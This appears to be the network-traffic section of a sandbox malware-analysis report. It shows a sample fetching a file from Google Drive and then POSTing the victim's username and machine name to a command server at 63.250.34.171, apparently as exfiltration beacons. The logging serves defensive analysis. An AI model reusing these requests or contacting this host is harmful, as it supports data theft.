                      Dec 2, 2021 08:33:44.413027048 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.413774967 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.456873894 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.627492905 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.627815008 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.629110098 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.629400015 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.630346060 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.630512953 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.632742882 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.632924080 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.633044004 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.633322954 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.639421940 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.639605999 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.643305063 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.643528938 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.644820929 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.644994974 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.645023108 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.645173073 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.645301104 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.645443916 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.645464897 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.645632982 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.646538973 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.646756887 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.646780014 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.646985054 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.647794962 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.648041964 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.648088932 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.648272991 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.649055004 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.649228096 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.649267912 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.649401903 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.650284052 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.650418997 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.650437117 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.650608063 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.651479006 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.651669025 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.651693106 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.651892900 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.652719021 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.652888060 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.652945042 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.653078079 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.653927088 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.654083014 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.654114962 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.654247999 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.655015945 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.655137062 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.655236959 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.655342102 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.656228065 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.656445980 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.656459093 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.656605959 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.657341957 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.657634020 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.657646894 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.657880068 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.658457994 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.658581972 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.658592939 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.658691883 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.659557104 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.659759998 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.659771919 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.659858942 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.660707951 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.660844088 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.660856962 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.660922050 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.661957979 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.662045002 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.662055969 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.662139893 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.663055897 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.663156033 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.663180113 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.663252115 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.663908005 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.663978100 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.664004087 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.664077997 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.664088011 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.664153099 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.664778948 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.664845943 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.664855003 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.664915085 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.665575027 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.665671110 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.665680885 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.665740013 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.666290045 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.666376114 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.666383982 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.666446924 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.667062998 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.667289019 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.667326927 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.667407990 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.667989016 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.668061972 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.668086052 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.668232918 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.668636084 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.668709040 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.668724060 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.668787003 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.669384003 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.669456005 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.669522047 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.669584036 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.669838905 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.669914007 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.669929028 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.669989109 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.670665979 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.670742989 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.670759916 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.670830011 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.671458960 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.671554089 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.671571016 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.671653986 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.672180891 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.672269106 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.672283888 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.672362089 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.673002958 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.673113108 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.673129082 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.673187971 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.673696041 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.673768997 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.673784018 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.673846006 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.674459934 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.674561977 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.674577951 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.674705982 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.675126076 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.675265074 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.675281048 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.675362110 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.675842047 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.675920963 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.675936937 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.675997972 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.676558971 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.676652908 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.676668882 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.676769972 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.677189112 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.677290916 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.677306890 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.677460909 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.677503109 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:44.677547932 CET44349808142.250.203.97192.168.2.4
                      Dec 2, 2021 08:33:44.677633047 CET49808443192.168.2.4142.250.203.97
                      Dec 2, 2021 08:33:46.695943117 CET4981080192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:46.864495993 CET804981063.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:46.864640951 CET4981080192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:46.876918077 CET4981080192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:47.046734095 CET804981063.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:47.046885967 CET4981080192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:47.215236902 CET804981063.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:47.897661924 CET804981063.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:47.897712946 CET804981063.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:47.897794962 CET4981080192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:47.898374081 CET4981080192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:48.066498995 CET804981063.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:50.434643030 CET4981180192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:50.603104115 CET804981163.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:50.603245974 CET4981180192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:50.606987000 CET4981180192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:50.775549889 CET804981163.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:50.775675058 CET4981180192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:50.943902969 CET804981163.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:51.640058041 CET804981163.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:51.640099049 CET804981163.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:51.640213966 CET4981180192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:51.640814066 CET4981180192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:51.809161901 CET804981163.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:52.846837044 CET4981280192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:53.012428045 CET804981263.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:53.012624979 CET4981280192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:53.022578001 CET4981280192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:53.188790083 CET804981263.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:53.188894987 CET4981280192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:53.354134083 CET804981263.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:53.944992065 CET804981263.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:53.945019007 CET804981263.250.34.171192.168.2.4
                      Dec 2, 2021 08:33:53.945117950 CET4981280192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:53.946496964 CET4981280192.168.2.463.250.34.171
                      Dec 2, 2021 08:33:54.111385107 CET804981263.250.34.171192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Dec 2, 2021 08:33:42.644826889 CET6480153192.168.2.48.8.8.8
                      Dec 2, 2021 08:33:42.671138048 CET53648018.8.8.8192.168.2.4
                      Dec 2, 2021 08:33:44.315254927 CET6172153192.168.2.48.8.8.8
                      Dec 2, 2021 08:33:44.341698885 CET53617218.8.8.8192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Dec 2, 2021 08:33:42.644826889 CET192.168.2.48.8.8.80x70ffStandard query (0)drive.google.comA (IP address)IN (0x0001)
                      Dec 2, 2021 08:33:44.315254927 CET192.168.2.48.8.8.80xe2a7Standard query (0)doc-0s-8g-docs.googleusercontent.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Dec 2, 2021 08:33:42.671138048 CET8.8.8.8192.168.2.40x70ffNo error (0)drive.google.com142.250.203.110A (IP address)IN (0x0001)
                      Dec 2, 2021 08:33:44.341698885 CET8.8.8.8192.168.2.40xe2a7No error (0)doc-0s-8g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                      Dec 2, 2021 08:33:44.341698885 CET8.8.8.8192.168.2.40xe2a7No error (0)googlehosted.l.googleusercontent.com142.250.203.97A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • drive.google.com
                      • doc-0s-8g-docs.googleusercontent.com
                      • 63.250.34.171

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.449807142.250.203.110443C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.449808142.250.203.97443C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.44981063.250.34.17180C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      TimestampkBytes transferredDirectionData
                      Dec 2, 2021 08:33:46.876918077 CET6188OUTPOST /tickets.php?id=156 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 63.250.34.171
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 413CA904
                      Content-Length: 190
                      Connection: close
                      Dec 2, 2021 08:33:47.046885967 CET6188OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: 'ckav.rujones562258DESKTOP-716T771k08F9C4E9C79A3B52B3F739430jKQiv
                      Dec 2, 2021 08:33:47.897661924 CET6637INHTTP/1.1 403 Forbidden
                      Date: Thu, 02 Dec 2021 07:33:46 GMT
                      Server: Apache/2.4.38 (Debian)
                      Content-Length: 287
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.44981163.250.34.17180C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      TimestampkBytes transferredDirectionData
                      Dec 2, 2021 08:33:50.606987000 CET6637OUTPOST /tickets.php?id=156 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 63.250.34.171
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 413CA904
                      Content-Length: 190
                      Connection: close
                      Dec 2, 2021 08:33:50.775675058 CET6638OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: 'ckav.rujones562258DESKTOP-716T771+08F9C4E9C79A3B52B3F739430odDyz
                      Dec 2, 2021 08:33:51.640058041 CET6638INHTTP/1.1 403 Forbidden
                      Date: Thu, 02 Dec 2021 07:33:50 GMT
                      Server: Apache/2.4.38 (Debian)
                      Content-Length: 287
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.44981263.250.34.17180C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      TimestampkBytes transferredDirectionData
                      Dec 2, 2021 08:33:53.022578001 CET6639OUTPOST /tickets.php?id=156 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 63.250.34.171
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 413CA904
                      Content-Length: 163
                      Connection: close
                      Dec 2, 2021 08:33:53.188894987 CET6639OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: (ckav.rujones562258DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Dec 2, 2021 08:33:53.944992065 CET6640INHTTP/1.1 403 Forbidden
                      Date: Thu, 02 Dec 2021 07:33:53 GMT
                      Server: Apache/2.4.38 (Debian)
                      Content-Length: 287
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.449807142.250.203.110443C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      TimestampkBytes transferredDirectionData
                      2021-12-02 07:33:43 UTC0OUTGET /uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: drive.google.com
                      Cache-Control: no-cache
                      Cookie: CONSENT=YES+GB.en-GB+V9+BX
                      2021-12-02 07:33:44 UTC0INHTTP/1.1 302 Moved Temporarily
                      Content-Type: text/html; charset=UTF-8
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Thu, 02 Dec 2021 07:33:44 GMT
                      Location: https://doc-0s-8g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3f39crtgptlkpn346psio1vva/1638430350000/13431600623523591888/*/1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N?e=download
                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                      Content-Security-Policy: script-src 'nonce-/Qq6URFJMfjYeE2ndjSTeg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                      Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                      X-Content-Type-Options: nosniff
                      X-Frame-Options: SAMEORIGIN
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
